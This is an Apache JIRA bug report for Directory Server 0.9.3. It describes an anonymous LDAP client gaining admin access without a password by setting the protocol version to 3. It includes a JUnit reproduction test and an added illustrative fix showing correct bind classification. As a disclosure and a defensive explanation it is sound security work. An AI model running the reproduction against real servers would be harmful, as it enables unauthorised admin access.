Anonymous user may gain access as admin user
--------------------------------------------
Key: DIREVE-239
URL: http://issues.apache.org/jira/browse/DIREVE-239
Project: Directory Server
Type: Bug
Versions: 0.9.3
Reporter: Endi S. Dewata
Assigned to: Alex Karasulu
Anonymous user may gain access as admin user by specifying
java.naming.ldap.version=3 in the JNDI client.
To show the problem, add a print statement in the AuthenticationService.java at
line 369:
    // perform the authentication
    LdapPrincipal authorizationId = authenticator.authenticate( ctx );
    System.out.println("Authorization ID: "+authorizationId);
Start the server, then run the following program:
import junit.framework.TestCase;
import javax.naming.Context;
import javax.naming.NamingEnumeration;
import javax.naming.directory.*;
import java.util.Hashtable;

public class Test extends TestCase {

    public void testAnonymousBindWithLDAPVersion3() throws Exception {
        String suffix = "dc=apache,dc=org";

        Hashtable env = new Hashtable();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
        env.put(Context.PROVIDER_URL, "ldap://localhost:10389/");
        // env.put("java.naming.ldap.version", "3");

        DirContext ctx = new InitialDirContext(env);

        SearchControls sc = new SearchControls();
        sc.setSearchScope(SearchControls.SUBTREE_SCOPE);
        NamingEnumeration ne = ctx.search(suffix, "(objectClass=*)", sc);

        System.out.println("Search results:");
        int counter = 0;
        while (ne.hasMore()) {
            SearchResult sr = (SearchResult)ne.next();
            String rdn = sr.getName();
            System.out.println(" - "+("".equals(rdn) ? suffix : rdn+","+suffix));
            counter++;
        }
        System.out.println("Found "+counter+" entries.");

        ctx.close();
    }
}
Without specifying java.naming.ldap.version=3, the user will remain anonymous
(empty Authentication ID). However, with java.naming.ldap.version=3, the
anonymous user gets authenticated as the admin user without even specifying any
password.
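The defect described above is an identity decision that depends on the protocol version instead of on the bind credentials. The following is an added illustration, not code from Apache Directory Server or from the reporter, of how a server-side bind handler should classify a simple bind: an empty DN with empty credentials is anonymous, a non-empty DN with empty credentials is an unauthenticated bind (which RFC 4513 recommends rejecting by default), and only a non-empty DN with non-empty credentials is a candidate for password verification. The class name BindClassifier, the BindKind enum and the principal strings are assumptions made for this example; the protocol version is accepted only to show that it must not influence the result.

```java
import java.util.Arrays;

/** Hypothetical helper (not ApacheDS code): classifies a simple bind request. */
public class BindClassifier {

    public enum BindKind { ANONYMOUS, UNAUTHENTICATED, SIMPLE }

    /** Constructed placeholder for the server's privileged identity. */
    static final String ADMIN_DN = "uid=admin,ou=system";

    /**
     * Decide what kind of bind was requested. The LDAP protocol version is
     * validated but deliberately plays no role in the classification: a
     * version 2 and a version 3 bind with the same DN and credentials must
     * always land in the same category.
     */
    public static BindKind classify(int ldapVersion, String bindDn, byte[] credentials) {
        if (ldapVersion != 2 && ldapVersion != 3) {
            throw new IllegalArgumentException("unsupported LDAP protocol version: " + ldapVersion);
        }
        boolean dnEmpty = bindDn == null || bindDn.trim().length() == 0;
        boolean credsEmpty = credentials == null || credentials.length == 0;

        if (dnEmpty && credsEmpty) {
            return BindKind.ANONYMOUS;
        }
        if (credsEmpty) {
            // RFC 4513 section 5.1.2: servers SHOULD reject this by default.
            return BindKind.UNAUTHENTICATED;
        }
        return BindKind.SIMPLE;
    }

    /**
     * Map a classified bind to the principal the session runs as. Only a
     * SIMPLE bind whose password verifies can ever become ADMIN_DN; the
     * anonymous and unauthenticated cases yield the empty principal. The
     * verification step is a stand-in here and is not the server's own check.
     */
    public static String principalFor(BindKind kind, String bindDn, byte[] credentials) {
        switch (kind) {
            case ANONYMOUS:
                return "";
            case UNAUTHENTICATED:
                throw new SecurityException("unauthenticated bind refused for " + bindDn);
            case SIMPLE:
                if (passwordMatches(bindDn, credentials)) {
                    return bindDn;
                }
                throw new SecurityException("invalid credentials for " + bindDn);
            default:
                throw new IllegalStateException("unreachable");
        }
    }

    /** Constructed stand-in for a real credential store lookup. */
    static boolean passwordMatches(String bindDn, byte[] credentials) {
        byte[] expected = "secret-placeholder".getBytes();
        return ADMIN_DN.equals(bindDn) && Arrays.equals(expected, credentials);
    }

    public static void main(String[] args) {
        // Constructed inputs: the anonymous bind that the JNDI client sends
        // when no principal or credentials are configured, once per version.
        for (int version : new int[] { 2, 3 }) {
            BindKind kind = classify(version, "", new byte[0]);
            String principal = principalFor(kind, "", new byte[0]);
            System.out.println("version " + version + ": " + kind + ", principal='" + principal + "'");
        }
        // A non-empty DN without a password must not silently become that DN.
        try {
            principalFor(classify(3, ADMIN_DN, null), ADMIN_DN, null);
        } catch (SecurityException e) {
            System.out.println("version 3, empty password: " + e.getMessage());
        }
    }
}
```

Running main prints the same result for both protocol versions (ANONYMOUS with an empty principal) and a refusal for the admin DN without a password, which is the behaviour the report expects and the server in 0.9.3 does not deliver. The design point is that the version negotiated in the bind request is protocol metadata and must never be an input to authentication or authorization decisions.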
--
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators:
http://issues.apache.org/jira/secure/Administrators.jspa
-
For more information on JIRA, see:
http://www.atlassian.com/software/jira